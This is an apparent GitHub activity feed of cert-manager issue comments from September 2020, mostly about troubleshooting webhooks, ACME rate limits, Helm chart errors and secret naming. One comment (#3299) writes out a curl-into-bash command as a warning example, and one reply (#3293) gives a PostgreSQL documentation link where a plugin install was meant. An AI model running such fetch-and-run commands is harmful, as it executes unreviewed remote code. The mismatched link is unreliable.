After running clusterctl init to initialize Provider component in target cluster, I am facing the cert-manager-cainjector and cert-manager-webhook pods running not properly.

**Expected behaviour**:
cert-manager-cainjector and cert-manager-webhook pods running properly.

**Anything else we need to know?**:
Logs from pods:
[code]

[code]

[code]

[code]

[code]

**Environment

[2020-09-14 15:13] meyskens commented on #3185
Can you try deleting the secrets cert-manager-webhook-* ?

[2020-09-14 15:19] manast commented on #3270
interestingly changing to a different subdomain worked. But @meyskens could you tell me how do you come to the same conclusion by checking the logs I provided?, and do you know how can I get more concrete information about the underlying problem?

[2020-09-14 15:24] gudipudipradeep commented on #3276
@meyskens  I am  able to access other service by using svc.cluster.local. but this one we are getting issue. at the same time in Azure aks master will be hidden mode.

[2020-09-14 15:33] cihangirbesiktas commented on #3274
I've tried that and still have the same errors.

[2020-09-14 15:37] youyongsong commented on #3185
I just solved this problem, it is caused by my deployment environment. The limit value of cert-manager-webhook is set too small, which causes the webhook to fail to start normally. The problem will be solved after increasing it.

[2020-09-14 16:18] furkatgofurov7 commented on #3281
Similar [issue](https://github.com/jetstack/cert-manager/issues/3185)  that was closed without finding the cause.

[2020-09-14 16:19] cihangirbesiktas commented on #3274
I've also tried on a minikube cluster and have the issue produced there as well. Keep in mind that I am deploying with `installCRDs: true`.

[2020-09-14 17:01] cihangirbesiktas commented on #3274
@meyskens

It looks like these two commits causing this issue -
https://github.com/jetstack/cert-manager/commit/627b57fed59d130e93492d802838bd007eb3a3dd
https://github.com/jetstack/cert-manager/commit/abb56fb0b50e107920cc8000fc1d19d303187f9e

[2020-09-14 17:05] hubstairs-admin opened #3282 "Multiple issuers to issuing prod certificate from Vault ingress with ACME ClusterIssuer"
/kind bug

**Cert-manager Version**: v1.0.1
**Environment** :
 - Google Kubernetes Engine (1.16)
 - haproxy-ingress (community) (v0.0.27 helm chart)

**What you expected to happen**:
Issuing a certificate from Vault Ingress (defined on helm chart values) with ACME prod :
[code]

When I try to issue a certificate with a prod ClusterIssuer (with an ACME support), 4 issuers run :
[code]

It appears t

[2020-09-14 17:07] cihangirbesiktas commented on #3274
it looks like it's expected that csrUsages needs to be the same with defaultInternalKeyUsages when a csrUsage is provided within the spec.
`!isUsageEqual(csrUsages, defaultInternalKeyUsages)`

[2020-09-14 18:25] furkatgofurov7 commented on #3185
@youyongsong hi! which limit value are you referring to, can you please refer to any documentation, how to set limit value of cert-manager-webhook ?

[2020-09-15 02:58] youyongsong commented on #3185
@furkatgofurov7  The value of limit refers to the `resources.limits` filed in cert-manager-webhook deployment manifest.

[2020-09-15 02:59] Kampe commented on #1730
testing with 1.0.1, this is still an issue

[2020-09-15 04:17] Simon0Liu commented on #2319
I have exactly the same issue，when I try to execute `kubectl apply -f test-resources.yaml`, I got
`Error from server (InternalError): error when creating "test-resources.yaml": Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=10s: context deadline exceeded`

**My environment 1:**
Platform: UCloud
OS:

[2020-09-15 06:55] 4ss3g4f commented on #3261
@meyskens ,

We will try tshoot, and get back with the result,

Thank you

[2020-09-15 07:01] timfeirg commented on #3277
I've added those detail to my issue description, see "the CertificateRequest object detail" @james-w

[2020-09-15 08:00] meyskens commented on #1730
@Kampe we no longer mount any secrets in, can you make a new issue?

[2020-09-15 08:02] Kampe commented on #1730
I spoke too soon, this is only an issue if you have multiple versions issues going on, wipe clean and all is well.

[2020-09-15 08:03] meyskens commented on #3270
@manast I do not use the logs, they are really a last resort, one of your kubectl describes said:
[code]

[2020-09-15 08:06] meyskens commented on #3250
I have seen this behavior in the controller that creates the orders, it doesn't properly check those. We should improve this logic.

/milestone v1.1
/area acme
/priority important-soon

[2020-09-15 08:07] manast commented on #3270
aha. And how can I get more information regarding this problem? because the failing domain is ```europe-west-4-a.taskforcesh.dev``` whereas ```europe-west-4-b.taskforcesh.dev``` works. If somehow it is possible to get into this situation again while in production it would be kind of a nightmare if we cannot resolve it :/

[2020-09-15 08:29] furkatgofurov7 commented on #3185
@youyongsong thanks for reply, but seems there is no `resources.limits` field in cert-manager-webhook in my deployment manifest

[2020-09-15 08:32] furkatgofurov7 commented on #3185
[code]

[2020-09-15 08:43] meyskens commented on #3274
`!isUsageEqual(csrUsages, defaultInternalKeyUsages)` is there to make sure it ignores it if they are the default ones.

I looked into this and `isCA: true` but not having usage "cert sign" caused this one.
A patch is now in https://github.com/jetstack/cert-manager/pull/3279

[2020-09-15 08:44] 4ss3g4f commented on #3261
[code]

[code]
[code]

Issuer ready is true, but why CertificateRequest reason is pending ??

[2020-09-15 08:50] james-w commented on #3277
[code]

Why did you choose this? Do you have an external issuer?

[2020-09-15 10:04] meyskens commented on #2354
/assign @wallrj

[2020-09-15 10:04] meyskens commented on #3140
for the person picking this up contact @james-w

[2020-09-15 10:50] tamalsaha opened #3283 "Passing apiVersion as apiGroup should give a validation error"
**Describe the bug**:
I am using cert-manager v1.0.1. If I use `apiVersion` as `apiGroup`, the generated secret name becomes `spec.secretName-${random_suffix}`.

[code]

**Expected behaviour**:
I expected sert-manager to throw error that the group name is not valid. More importantly, I did not expect cert-manager to generate an opaque secret with name `spec.secretName`-${random_suffix}`

**Steps t

[2020-09-15 13:23] nsteinmetz commented on #3264
Ok got support from OVH team on their k8s managed service

I restarted you APIServer, and looking from the logs from the cainjector pod from cert-manager, the issue should be solved

I can now create cert-manager resources as expected.

Thanks @meyskens for your answers and sorry for the noise ;-)

[2020-09-15 13:23] #3264 closed

[2020-09-15 14:30] C3po23 commented on #3273
the software is [https://www.nexusgroup.com/fr/smart-id/corporate-pki/]

What bother me is that i don't see any pods or ingress creation in the event ...

[2020-09-15 16:43] timfeirg commented on #3277
`spec.issuerRef.group: acme.einplus` was mistakenly added to `values.yaml`, in ignorance of its actual meaning.

I've removed this line, do a through cleanup, then collect the output of `kubectl get certificaterequest -o yaml` once again, the event list is still empty,  however the status field is populated.

cert-manager components logs, along with the yaml content of certificaterequest, and orde

[2020-09-15 17:01] james-w commented on #3277
Hi, the logs are missing any output from the order controller, is this just a subset of the logs? Could you try increasing the verbosity of the logs and then capturing the logs while creating the `CertificateRequest`?

[2020-09-15 19:06] detiber opened #3284 "Support for deploying one or more issuers from helm chart"
**Is your feature request related to a problem? Please describe.**

It would be great if there was a way to deploy one or more issuers using the helm chart, this would assist with bootstrapping cert-manager especially for use in testing environments. It would also be great if there was a way to bootstrap the self-signed issuer, generate a CA-capable certificate using the self-signed issuer and use

[2020-09-15 20:41] meyskens opened #3285 "ACME IP Address support"
**Is your feature request related to a problem? Please describe.**
With Let's Encrypt adding support for IP Address certificates cert-manager should add support for IPs inside the ACME Order

**Describe the solution you'd like**
ipAddresses to be added into ACME and validated using HTTP-01 following https://tools.ietf.org/html/rfc8738

/kind feature

[2020-09-15 20:41] meyskens commented on #3285
/area acme
/priority important-longterm
/assign

[2020-09-15 21:24] meyskens commented on #3285
https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#ingressrule-v1-networking-k8s-io
This is an issue, we cannot use ingress it seems... considering a loadbalancer service but given it needs to be on port 80 that will be an issue as it cannot run next to the app it needs to secure.

[2020-09-15 21:28] meyskens commented on #3285
[code]

the host is optional, we can go for this approach for IP validation instead

[2020-09-16 04:13] Kampe commented on #3258
I'm unable to apply my Issuers with v1.0.1, unsure what's going on here but I see the same error.

[2020-09-16 04:28] Kampe commented on #2602
This happens when you put any annotations on the Issuer or ClusterIssuer resources. Causes it to fail the validating webhook.

[2020-09-16 06:18] timfeirg commented on #3277
this is the complete output of `k -n kube-system logs -f -l app.kubernetes.io/instance=cert-manager`.

I've increased logLevel to 6, but the log output is a little too much, so I `grep`ed the related parts.

@james-w

[2020-09-16 09:22] james-w commented on #3277
[code]

[2020-09-16 15:48] timfeirg commented on #3277
I'm quite familiar with rate limit errors, I've seen those back when I setup v0.15.2, they appear directly in cert-manager logs.

but my god, I am indeed being rate limited right now, thank you tremendously for helping me out.

![image](https://user-images.githubusercontent.com/4319104/93361106-0b251e00-f877-11ea-8693-e9f8a59161f4.png)

[2020-09-16 15:59] #3277 closed

[2020-09-17 02:31] hamishforbes opened #3286 "Aggregated ClusterRoles don't include acme resources"
**Describe the bug**:
The `cert-manager-view` and `cert-manager-edit` clusterRoles created by the Helm chart don't give access to orders or challenges

**Expected behaviour**:
Users bound to the default `view` cluster role should be able to view orders and challenges

Just needs the following adding to the clusterRole in the [helm rbac](https://github.com/jetstack/cert-manager/blob/master/deploy/c

[2020-09-17 03:43] naineel commented on #2380
We are facing this exact same issue

[2020-09-17 06:24] alastairs commented on #2380
/reopen

[2020-09-17 08:33] Jacob1r opened #3287 "HTTP working but HTTPS shows 404 page not found"
update

I did

**kubectl get ingressroute -A**

[code]

and then I did

**kubectl delete ingress example-ingress -n example**

`ingress.extensions "example-ingress" deleted`

and now http://example.com gives 404

but https://example.com works fine with secured cert and all?

**Describe the bug**:
When I visit HTTP version of domain it shows a simple word on the page.
When I visit the HTTPS version

[2020-09-17 09:23] meyskens commented on #2175
To the person picking this up: contact me to configure the new Venafi credentials

[2020-09-17 09:34] bukowa commented on #1621
I wonder what's `jetstack/tor-proxy` ?

[2020-09-17 10:32] meyskens commented on #843
We're taking on this for the v1.1 release, pkcs#12 and jks support already solves many of the usecases described above. Similar to this it would be nice to add "single PEM" support in something like:

[code]

using the logic of the already present alternate keyStores.

[2020-09-17 10:43] meyskens opened #3289 "Update cainjector API versions"
The cainjector is still depending on a lot of beta APIs in the controller: https://github.com/jetstack/cert-manager/blob/master/pkg/controller/cainjector/injectors.go

We should look into replacing those without breaking any older Kubernetes versions.

/kind feature
/area cainjector
/priority important-soon
/milestone v1.1

[2020-09-17 11:58] meyskens opened #3290 "Add upgrade testing"
**Is your feature request related to a problem? Please describe.**
We would want to test the upgrade experience of cert-manager with the v1.0 promise. More specifically to ensure that the upgrade doesn't cause things like existing resources to break.

**Describe the solution you'd like**
An automated end-to-end style test that we can run as periodic and maybe also on PR that takes the previous ver

[2020-09-17 12:01] meyskens opened #3291 "GitOps based e2e tests"
**Is your feature request related to a problem? Please describe.**
Currently our Helm installation method gets a lot of tests thanks due to it being used in our e2e tests.
In relation to #3290 we should also test a GitOps style deployment (tools TBD) to test the deployment of cert-manager and the upgrade process using these tools.

/kind feature
/area testing
/milestone v1.1
/priority important-lo

[2020-09-17 12:05] meyskens opened #3292 "Check dependancies"
We depends on a few projects, we should look if all these are supported and up to date (patch) versions to make sure al bugs and security issues are fixed.

/priority important-soon
/milestone v1.1

[2020-09-17 15:14] kfirfer opened #3293 "Operation cannot be fulfilled"
Hello

Kubernetes version: 1.18.8

I have uninstalled cert-manager 0.15.2 completely and installed 1.0.1
After trying to issue certificate, the cert is not becomes ready, the logs from cert-manager pod print this:

[code]

This is part of the events:

[code]

### This is the manifasts:

[code]

[code]

[2020-09-17 17:07] james-w commented on #3293
Can you show us what `certificaterequest domain-co-il-wildcard-clusterissuer-tls-9xtgw` looks like, and then whatever `order` and `challenge` resources are referenced from there. (Installing https://www.postgresql.org/docs/9.1/queries-with.htm and then using `kubectl cert-manager status certificate domain-co-il-wildcard-clusterissuer-tls` would make this easier)

Also would you check letsdebug.net

[2020-09-17 17:16] kfirfer commented on #3293
[code]

[code]

[2020-09-17 17:18] kfirfer commented on #3293
P.S.
When I use the annotation under ingress its worked
For e.g.:  cert-manager.io/cluster-issuer: letsencrypt-wildcard-clusterissuer

But when I create manually certificate it doesnt

[2020-09-17 17:48] james-w commented on #3293
I think that this is another case of https://github.com/jetstack/cert-manager/issues/3267

[2020-09-17 17:57] kfirfer commented on #3293
its really rate limit problem
would be nice to see description in the logs that rate limit is reached

[2020-09-17 18:37] kfirfer commented on #3293
Its seems not only rate limit problem..
I changed the domain to another one, and still same logs...

[2020-09-17 19:29] #3287 closed, assigned to nobody

[2020-09-17 20:51] furkatgofurov7 commented on #3281
We can close this, as there was a problem with calico setup in my environment!
/close

[2020-09-17 20:51] #3281 closed

[2020-09-17 21:13] mathianasj opened #3294 "Certificate Not Found when secret quota exceeded"
**Describe the bug**:
The status is misleading when secret quota has been exceeded.

**Expected behaviour**:
If cert manager cannot create a secret in the namespace the certificate status should not state certificate not found, it should say quota exceeded for target namespace or something that states the underlying failure

**Steps to reproduce the bug**:
Steps to reproduce the bug should be clea

[2020-09-18 07:50] devopstales commented on #2764
With `cert-manager.io/v1` the `keyAlgorithm` option of `Certificate` custom resource was removed so the solution @meyskens suggested, dose not working anymore.

[2020-09-18 09:01] meyskens commented on #2764
@devopstales I would never remove ECDSA from a product :wink: (unless it is the year 2040 and it is deemed insecure)
We just moved it to a new home: https://cert-manager.io/docs/reference/api-docs/#cert-manager.io/v1.CertificatePrivateKey

[code]

[2020-09-18 10:39] BartoszZawadzki commented on #3293
We are facing the same issue:

`cert-manager-db79d5df4-lw4fr cert-manager E0918 09:29:52.061076       1 controller.go:158] cert-manager/controller/CertificateKeyManager "msg"="re-queuing item  due to error processing" "error"="Operation cannot be fulfilled on certificates.cert-manager.io \"argocd-secret\": the object has been modified; please apply your changes to the latest version and try again"

[2020-09-18 11:53] nolancon commented on #2640
AFAIK kubeadm checks your current environment variables when initializing. So before running `kubeadm init`, you should
`export no_proxy=$no_proxy,.svc,.svc.cluster.local` and kubeadm should then pick them up. Worked for me.

[2020-09-18 12:24] #3260 closed

[2020-09-18 12:36] manast commented on #494
have any of you actually made kubed work properly?
In my last attempt it copies the initial secret which does not yet including the certificate data from lets-encrypt, and when cert-manager does its thing and puts the new secret, kubed does nothing. Furthermore it also copies the secret to the default namespace when I am just using a special label as selector for specific namespaces... Do you have

[2020-09-18 12:39] manast commented on #494
@sheerun which permissions do you need in order to run the script? I am assuming it does not work out of the box considering that you are coping a resource from one namespace to another?

[2020-09-18 12:49] florianrusch commented on #2166
/reopen Same problem at our side!

[2020-09-18 13:02] aeimer opened #3297 "Helm Repo BROKEN"
**Describe the bug**:
I get a
` Error: looks like "https://charts.jetstack.io" is not a valid chart repository or cannot be reached: error unmarshaling JSON: while decoding JSON: json: unknown field "serverInfo"` when I want to add the jetstack repo via helm 3.

**Expected behaviour**:
A concise description of what you expected to happen.

**Steps to reproduce the bug**:
Steps to reproduce the bug

[2020-09-18 13:06] meyskens commented on #3297
What is the exact version of Helm that you are using?

[2020-09-18 13:15] meyskens commented on #3297
Seems to be an upstream issue: see https://github.com/helm/helm/issues/8761

[2020-09-18 13:19] manast commented on #494
here another alternative cmd to @sheerun's if you want to sync all secrets to the namespaces that matches a label, in this example ```app=sync```. If we add a label to the secrets too we could of course only sync those secrets, basically what kubed is supposed to do but running in a cronjob instead:
[code]

[2020-09-18 13:43] aeimer commented on #3297
Yeah propably... Lets close this Issue

[2020-09-18 13:55] meyskens commented on #3297
/close

[2020-09-18 13:55] #3297 closed

[2020-09-18 14:08] fmasion opened #3298 "Let's encrypt certificate caching to mitigate rate limits problems"
**Problem to solve.**
When you reinstall multiple times an app (with helm for exemple) each time you ask for a new certificate.
Let's encrypt rate limits can be reached fairly quickly.
The problem is we consume limited let's encrypt calls but the certificates are discarded for a new one for no good reason : they are still valid.

**the request**
The idea is to have some 'cert cache'.
So when I des

[2020-09-18 14:12] meyskens commented on #3298
Adding a cert cache would also mean a private key cache, which then becomes a security risk.

We could add an option to not delete the certificate and secret when an ingress is deleted, that might solve it?

[2020-09-18 16:14] #3144 closed

[2020-09-18 19:34] kbirkeland commented on #3297
I would like to kindly reopen this issue.  While the upstream change did cause this behavior, this is a breaking change due to a security vulnerability and it will not be reversed.  Helm now strictly validates manifests, and the `serverInfo` field is breaking that validation.

There's a more in-depth discussion at the upstream issue that was previously linked.  In particular, this comment sums it

[2020-09-19 00:50] ben-turner opened #3299 "Why are CRDs so big?"
A 1.7MB and 25000 line YAML file is insane. kubectl still hasn't even parsed the file after 30+ minutes for my test cluster. Aside from that, I don't think it's ever a good idea to apply random manifests to a cluster without reviewing them first (you wouldn't run `curl github.com/some/random/file.sketchy | /bin/bash` on your prod servers), but at that size it's going to take days or weeks to go th

[2020-09-19 04:50] meyskens commented on #3299
It seems you're hitting https://github.com/jetstack/cert-manager/issues/3121

Please upgrade your kubectl.

cert-manager can do waaay more than kube-lego used to thanks to CRDs! Why are they so complex? Partly due to that but also due to extensive configuration possibilities like DNS providers or ACME solver pod configurations.

Hope this helped.

/close

[2020-09-19 04:50] #3299 closed

[2020-09-19 16:24] sonalijha1711 opened #3300 "Secret created with suffix random value causes error. Name generate : secret-name-<random-suffix>"
**Describe the bug**:
I installed 0.16.1 cert manger in my my GCP cluster. Also created ingress which refers the secret name `gcp-ml-services-nlp-tls`
But the generated secret name is with some random hash value `gcp-ml-services-nlp-tls-<randomsuffix>` so my deployment fails saying not able to find the secret as the secret is appended with some hash value.
But for cert manager 0.10 its fine , its

[2020-09-19 17:04] chauffer commented on #3133
I am also getting the same error while applying the manifest for 1.0.1 straight from GitHub on the latest version of k3s.

[2020-09-19 17:34] chauffer commented on #1582
`kubectl patch crd challenges.acme.cert-manager.io -p '{"metadata":{"finalizers": []}}' --type=merge` for v1.0.0+

[2020-09-21 13:49] raphink opened #3301 "Option to not include key usage in CSR"
I'm currently developing a [Puppet CA issuer](https://github.com/camptocamp/puppetca-issuer) for cert-manager. Unfortunately, the Puppet CA rejects key usage in the CSR and refuses to sign the CSR:

[code]

It would be great if there was a way to turn off key usage inclusion in the CSR, so the Puppet CA would accept it.

Implementation of this feature was discussed today on Slack: https://kubernet

[2020-09-21 13:54] jakexks commented on #3301
/kind feature
/priority important-soon
/milestone v1.1

[2020-09-21 14:28] jon-whit opened #3302 "Helm v1.0.1 chart cannot be added to list of repositories"
**Describe the bug**:
I'm getting an error when trying to add the `v1.0.1` helm chart. The error I am getting is:

[code]

**Expected behaviour**:
I expect the helm repository to be successfully added without any chart parsing errors.

**Steps to reproduce the bug**:
`helm repo add --debug jetstack https://charts.jetstack.io`

**Environment details:**:
- Kubernetes version: `v1.16`
- cert-manager

[2020-09-21 14:33] jon-whit commented on #3302
With helm client `v3.3.3` it works fine though.

[2020-09-21 16:16] #3300 closed

[2020-09-21 20:19] bansalrajat commented on #3087
Hi @meyskens  , i am getting an error
Warning  Failed     50s   cert-manager  The certificate request has failed to complete and will be retried: Failed to request venafi certificate: Certificate requests submitted to Venafi issuers must have the 'commonName' field or at least one other subject field set.

I am using venafi cloud for certificate .
Any idea how i can fix this.

[2020-09-22 02:40] igoratencompass commented on #1425
Not sure why is this closed, it seems an expired certificate issue with the `webhook`:
[code]
and the API log shows:
[code]

[2020-09-22 04:05] gwenall commented on #3300
Hi @sonalijha1711,
Could you please share the reason of this closure?
I think that would help others like me who are encountering the very same issue.
Thanks

[2020-09-22 05:08] gwenall commented on #3300
It seems this issue has been closed as it was a duplicate of https://github.com/jetstack/cert-manager/issues/3283

[2020-09-22 06:04] chinazj opened #3303 "webhook error: FailedDiscoveryCheck && write: broken pipe"
**Describe the bug**:

We went through a network card error, and then the cert-manager webhook has been in the FailedDiscoveryCheck state

I tried restarting the webhook (kubectl scale --replicas=0 ==>  kubectl scale --replicas=1), the status of the apiservice changed from MissingEndpoints to FailedDiscoveryCheck

v1beta1.webhook.certmanager.k8s.io  status

[code]

eth0 & calico error

[code]

kub

[2020-09-22 07:49] #3303 closed

[2020-09-22 07:50] chinazj commented on #3303
It should not be a cert problem

[2020-09-22 09:14] meyskens commented on #1425
@igoratencompass `certmanager.k8s.io` has been deprecated since version v0.10 which is 7 versions ago. I recommend to upgrade your installation.

[2020-09-22 09:15] meyskens commented on #3087
@bansalrajat see the PR that closed this issue, you can set the CN using `cert-manager.io/common-name` annotation

[2020-09-22 09:18] meyskens commented on #3302
This is an upstream issue that has been fixed https://github.com/helm/helm/issues/8761

[2020-09-22 09:19] meyskens commented on #3302
/close

[2020-09-22 09:19] #3302 closed

[2020-09-22 09:20] meyskens commented on #3301
/milestone v1.1

[2020-09-22 09:27] meyskens commented on #3297
@kbirkeland we use the latest chartmuseum tool, where this is an issue opened: https://github.com/helm/chartmuseum/issues/374

I cannot find a conversation that talks about failing validation when `serverInfo` is set in the future as it is fixed in v3.3.3.

[2020-09-22 11:44] meyskens commented on #3298
I looked into my idea and it might be a bad idea as we now ignore certs that have no owner in the ingress-shim, changing that will break people's setup. But i might have found an even better method, Helm has
[code]

You can put that on the ingress, however the nicest setup would be:

[code]

[2020-09-22 11:49] meyskens commented on #3294
/priority important-longterm

[2020-09-22 11:50] meyskens commented on #3286
/priority important-longterm
/area deploy
/good-first-issue

[2020-09-22 12:08] meyskens commented on #3283
Does that random named secret contain a cert?
cert-manager does this to store the private key while the cert is being issued.

However the group having `/v1` shuld never be valid, we should add a validation webhook for that.

[2020-09-22 12:18] meyskens commented on #3284
so here you pinpointed exactly why we didn't do this before, Helm doesn't allow us to do that. For exact context for this I want to refer to https://github.com/jetstack/cert-manager/issues/2330 and similar

[2020-09-22 12:24] meyskens commented on #3273
Would be good to look into those logs, what CM does is do a GET call on challenges in ACME, we have seen some ACME software not responding to these calls (since certbot doesn't do this) which causes an error inside cert-manager that it cannot create the ingress resouces.

[2020-09-22 12:34] meyskens commented on #2602
Can you file a seperate issue for that?

[2020-09-22 12:36] meyskens commented on #2882
Closing this one. Feel free to /reopen if needed.

/close

[2020-09-22 12:36] meyskens commented on #3283
/area api
/priority important-longterm

[2020-09-22 12:38] meyskens commented on #3238
Can you access `https://abc.com/.well-known/acme-challenge/Oej8tloD2wuHNBWS6eVhSKmGkZNfjLRemPmpJoHOPkA` from within a pod inside the cluster?

/triage support

[2020-09-22 12:39] meyskens commented on #3185
@furkatgofurov7 any errors in the log?

[2020-09-22 12:40] meyskens commented on #3222
/priority important-soon
/area acme/dns01

[2020-09-22 12:41] meyskens commented on #3222
/good-first-issue

[2020-09-22 12:43] tamalsaha commented on #3283
cert-manager does this to store the private key while the cert is being issued.

No, the secret only contains a private key (if I recall correctly), no cert.

That sounds good to me.

[2020-09-22 12:50] meyskens commented on #3223
I reccomend upgrading from 0.13 as we improved the prometheus metrics a lot in https://github.com/jetstack/cert-manager/pull/2923

[2020-09-22 13:05] unitto1 commented on #2605
did log format include here too?
any progress?) can we help you to implement this feature?

[2020-09-22 13:36] meyskens commented on #3247
Do you mind moving this to https://github.com/cert-manager/website/ this is where we keep our documentation

[2020-09-22 14:24] freym commented on #2140
Just a suggestion:
go-acme uses http basic auth to secure its webhooks:
https://go-acme.github.io/lego/dns/httpreq/

Now the webhooks do not need the the ability to query the Kubernetes API server and can run outside of Kubernetes.

[2020-09-22 14:45] manast commented on #1068
Interesting, I am getting the same error despite ```rbac.create``` being true (in current chart its ```global.rbac.create``` and it is actually true by default...

[2020-09-22 15:09] ppatierno opened #3307 "Let's Encrypt issuer certificate for OpenShift route fails with "propagation check failed""
I am running cert-manager on OpenShift 4.x and I have an application exposed through an OpenShift route.
I am trying to use Let's Encrypt to issue a certificate bringing the dns name for that route.
So my `Certificate` resource is:

[code]

What I get from the cert-manager log is the following error:

[code]

I see this  `propagation check failed`.

I tried to `curl` to the related http solver `In

[2020-09-22 15:15] furkatgofurov7 commented on #3185
@meyskens I have pasted all logs in the #3281 and actual error I was facing was not at all related to cert-manager, but calico. Thanks for response.

[2020-09-22 15:27] meyskens commented on #3307
I suggest following: https://cert-manager.io/docs/faq/troubleshooting/
Also I'd check for any ingresses being configured using `kubectl get ingress`

/triage support

[2020-09-22 15:31] meyskens commented on #2605
This mostly depends on a lack of support for JSON in https://github.com/kubernetes/klog
If there is a way we can add this either upstream or with something pluggable into klog in our part of the code that would be welcome

[2020-09-22 15:32] meyskens commented on #3283
Then the random name is expected, it will get renamed to the correct one once the cert got issued. This is to allow private key rotation.

[2020-09-22 15:34] meyskens commented on #3261
can you do `kubectl describe challenge` ?

[2020-09-22 15:34] lukasmrtvy commented on #2605
@meyskens isnt it possible since https://github.com/kubernetes/klog/releases/tag/v2.0.0 ?

[2020-09-22 15:35] meyskens commented on #3270
I think you might have hit a rate limit as https://github.com/jetstack/cert-manager/issues/3270#issuecomment-691503451 suggested

[2020-09-22 15:38] meyskens commented on #3282
[code]

not sure what these are... you do not need those for cert-manager, you can also leave out `kubernetes.io/tls-acme: "true"`

Also check of there is not other cert pointing to the same secret `kubectl get secret`

[2020-09-22 16:04] ppatierno commented on #3307
I already went through the troubleshooting steps and ...

Certificate is of course not in the `Ready` state, but the corresponding `CertificateRequest` was created fine.

[code]

The `CertificateRequest` has

[code]

The cluster issuer state is ok.

The moving to ACME troubleshooting, the `Order` has

[code]

but of course it's not "completed successfully".

Finally the `Challenge`

[code]

There

[2020-09-22 16:05] JoshVanL commented on #3223
Looks like a duplicate of https://github.com/jetstack/cert-manager/issues/2248

[2020-09-22 17:05] elmariofredo commented on #2482
@tylerauerbeck I have tried kustomize `v3.8.2` and it work like a charm.

[2020-09-22 17:09] whereismyjetpack commented on #2882
I'm not sure If i'm using this correctly or not, but when I attempt to reuse a key minted from a previously valid registration the CRD never becomes ready with the following message

`Failed to verify ACME account: 400 urn:ietf:params:acme:error:malformed: [External Account Binding] The account is not awaiting external account binding`

it appears that it's using the key, but still trying to an EA

[2020-09-22 19:13] manast commented on #3270
I am going to close this now. Still I do not know why this problem happens, could have been rate limit but I had no way to confirm it. Thanks to all the involved.

[2020-09-22 19:13] #3270 closed

[2020-09-22 19:43] meyskens commented on #2605
@lukasmrtvy i was reading something on k8s 1.19 and indeed... that should be possible now... i haven't tested it on cert-manager yet due it not being in the klog release notes i didn't notice it before

[2020-09-22 20:38] kaypeter87 commented on #3293
We are facing the same issues as above.

We currently have a working wildcard cert issued against one of our ingress in a different namespace:

`NAMESPACE       NAME               READY   SECRET             AGE
vault-prod      letsencrypt-prod   True    letsencrypt-prod   23h
vault-restore   letsencrypt-prod   False   letsencrypt-prod   3m38s`

The ingress is configured exactly the same as the wor

[2020-09-23 08:05] meyskens commented on #2605
Seems we still need to do some tricks to support this, mainly those done in  https://github.com/kubernetes/component-base/blob/master/logs/options.go

PRs are welcome for this :wink:

[2020-09-23 09:24] #3247 closed

[2020-09-23 09:25] riccardodl commented on #3247
Thanks for your answer, I've done that. See you there ;) https://github.com/cert-manager/website/issues/328

[2020-09-23 11:21] gudipudipradeep commented on #3276
@meyskens  found issue and solved related to kuberntes master. I was facing following issue. Please help on this.
`
Waiting for http-01 challenge propagation: wrong status code '403', expected '200'
`
challenge is showing pending state
![Capture1](https://user-images.githubusercontent.com/8638634/94006116-fdaeed00-fdbc-11ea-8856-248726e59b32.PNG)

[2020-09-23 19:09] gudipudipradeep opened #3309 "Waiting for http-01 challenge propagation: wrong status code '403', expected '200'"
`Waiting for http-01 challenge propagation: wrong status code '403', expected '200'`

cert-manager-version: v0.15.1
In challenge stage. Please help us.

[2020-09-23 21:45] yanjunli76 commented on #2789
Can we also add **truststore.pkcs12** to Secret when requesting Certificate from cert-manager?

[2020-09-23 23:23] vainkop opened #3310 "ingressTemplate annotation for whitelist not working"
We have multiple ingresses with annotations for ip whitelisting, for example:
[code]
The clusterissuer looks like this (doesn't work for not cluster issuer too):
[code]
Annotation for `0.0.0.0/0` is not applied to the ingress `example` & we get 403 in cert-manager logs & not able to renew the cert.

Am I missing smth here or it's a bug?

ingressTemplate + annotation is configured according to
http

[2020-09-23 23:45] katlimruiz opened #3311 "Certificate Order stuck"
Hi

I have a certificate order that is stuck in pending, I would like to know how could I reset the process?

I was wondering if I would delete the `order` or the `certificaterequest`, would it restart the process?

thanks

[2020-09-24 01:48] sch0718 commented on #3170
I understand that cert-manager automatically creates a new secret using the configured secret name.
But when I look at the log, I am looking for the secret name with the set name and a log says that it cannot be found.
What am I doing wrong?

cert-manager.yml
[code]

ingress.yml
[code]

generated secret name: yoda-prd-encrypt-secret-nk8cx

logs

[code]

[2020-09-24 04:35] katlimruiz commented on #3311
In the end after several hours investigating, I saw that it was because I was trying to use wildcard domains with http01.

It seems it kind of worked because at some point it was configured for naked domain only, and then we had to add subdomains, and perhaps it got out of sync with the requests to LE.

Anyway, that was the issue. I removed the wildcard from dnsNames and it created the Certificate

[2020-09-24 07:12] sch0718 opened #3312 "Why does cert-manager issue fake certificates?"
It has not been solved for more than two months already.
Somebody help me.
It seems that the installation and settings were successfully completed, but when I look at the log, it says that the certificate was not found.

GKE: 1.16.13-gke.401
cert-manager: 1.0.1
Ingress-Nginx: 3.3.0

**My Settings**
[code]

[code]

Logs
[code]

describe certificate
[code]

**What am I doing wrong?**

[2020-09-24 07:16] meyskens commented on #3170
@sch0718 I reccomend also checking other resources such as the certificatereqyes, order and challenge. For more info see https://cert-manager.io/docs/faq/troubleshooting/

[2020-09-24 07:17] meyskens commented on #3311
Is this fixed now? For future issues we recommend taking a look at https://cert-manager.io/docs/faq/troubleshooting/

[2020-09-24 07:21] meyskens commented on #3312
I recommend following https://cert-manager.io/docs/faq/troubleshooting/ and checking the other resources. You might also want to re-create it to see all events as Kubernetes garbage collects these after a while.

/triage support

[2020-09-24 07:24] meyskens commented on #3310
Are you by any chance using the `edit-in-place` annotation? If not can you get us the YAML of the ingress entry cert-manager created?

[2020-09-24 07:26] meyskens commented on #3310
Oh sorry just saw `acme.cert-manager.io/http01-edit-in-place: 'true'`

So that will put the path inside the ingress resource which it was created from. By doing that it will not change the annotations as otherwise it would overwrite the app's security policy.
If you remove that annotation cert-manager will create a new ingress resouce with the annotations set.

/remove-kind bug
/triage support

[2020-09-24 07:32] meyskens commented on #3309
I recommend https://cert-manager.io/docs/faq/troubleshooting/

[2020-09-24 07:33] meyskens commented on #3309
/triage support

[2020-09-24 07:34] meyskens commented on #3276
closing as a duplicate of https://github.com/jetstack/cert-manager/issues/3309

/close

[2020-09-24 07:34] #3276 closed

[2020-09-24 07:41] meyskens commented on #3223
Going to close this in that case, feel free to /reopen if needed

/close

[2020-09-24 07:41] #3223 closed
